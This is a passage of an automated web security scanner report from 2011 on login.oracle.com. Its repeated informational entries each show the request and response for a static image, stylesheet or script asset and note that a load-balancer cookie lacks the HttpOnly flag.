Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 188
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgev^6MQK6EVaAUS1EaweP001nuT
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a.......................................................................................................!.......,..........9.4.dY.f:........@..=./\H....k.......$t..D.(....t;M...x...;

6.17. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-r-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 190
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgexh6MQK6EVaAUS1EaweP001nuX
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a.......................................................................................................!.......,..........; %.$9..x..../y.1A...NB,6...2Y.b.I...L..V.0. "...*.8H..8. .B.;

6.18. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-l-b.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-l-b.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgeuK6MQK6EVaAUS1EaweP001nuO
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.D.di........
.,..........#.3!..R".$.......N..br29..[..@.4l.4@a...pw..;

6.19. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-l-t.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-l-t.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge^k6MQK6EVaAUS1EaweP001ntN
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$.AtHh..# ..C.t=..P.|=..DoH..v.^...>..^b..).U.$......8<....l......d..;

6.20. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-line.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-line.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgeuH6MQK6EVaAUS1EaweP001nuN
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a.............!.......,..............P.;

6.21. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-r-b.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-r-b.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 198
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgev06MQK6EVaAUS1EaweP001nuS
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a.......................................................................................................!.......,..........C`%.dINfj.j[.n
..L....5.8.(Gk(...PR...@...C..T....d].....N...y..x.!.;

6.22. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-r-t.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-r-t.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge_T6MQK6EVaAUS1EaweP001ntO
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$..xD...T..-......[.......G,.&D"!......"..5.U.$..r]./%.%s.YtU.e7.II..;

6.23. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-t-line.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-t-line.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfJ_6MQK6EVaAUS1EaweP001nvY
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89a.............!.......,...........D..Y.;

6.24. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/ip-o-logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/ip-o-logo.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 1728
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfGZ6MQK6EVaAUS1EaweP001nvK
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89ar..........22................BB.......................................................................................................__..........................................................
...[SNIP]...

6.25. https://login.oracle.com/mysso/sso_loginui/loginStyling_external.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/loginStyling_external.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/loginStyling_external.css?v=1.0 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:40 GMT
Accept-Ranges: bytes
Content-Length: 14395
Content-Type: text/css
Last-Modified: Wed, 24 Aug 2011 03:52:57 GMT
X-ORACLE-DMS-ECID: 0000JCHgeSK6MQK6EVaAUS1EaweP001nt7
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:40 GMT; path=/

/* Desktop Version */
body{font-family:Arial, Helvetica, sans-serif;}
.Mwrapper{ display:none;}
.wrapper{ display:block;margin:0px auto;width:974px; }
.logo-header{float:left; width:974px; height:50px
...[SNIP]...

6.26. https://login.oracle.com/mysso/sso_loginui/moc_lib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/moc_lib.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/moc_lib.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:39 GMT
Accept-Ranges: bytes
Content-Length: 5959
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge7K6MQK6EVaAUS1EaweP001nsd
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/

//-- moc_lib.js: Core JS library for www.oracle.com
var ORA_UCM_INFO;


//-- Function Library

// to populate the user name -------------------------------------------------//
function PopulateLogin()
...[SNIP]...

6.27. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/oracle-footer-tagline.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/oracle-footer-tagline.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 1711
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfGy6MQK6EVaAUS1EaweP001nvM
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ.
...[SNIP]...

6.28. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/oralogo_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/oralogo_small.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 2059
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge^I6MQK6EVaAUS1EaweP001ntL
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^.
...[SNIP]...

6.29. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-l.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-l.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 304
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge_U6MQK6EVaAUS1EaweP001ntP
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a.................................................................ST................XY............................TV............................PQ.................................................
...[SNIP]...

6.30. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-m-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-m-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 154
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge_v6MQK6EVaAUS1EaweP001ntS
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a.......................................................................................................!.......,...........`cY.C<.uE.rP..$.".KU1E..;

6.31. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-r.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-r.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 319
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge_m6MQK6EVaAUS1EaweP001ntR
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a............................................MO.......MN.......PQ.......ST.........................................................................................................................
...[SNIP]...

6.32. https://login.oracle.com/mysso/sso_loginui/sso_check.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/sso_check.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/sso_check.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
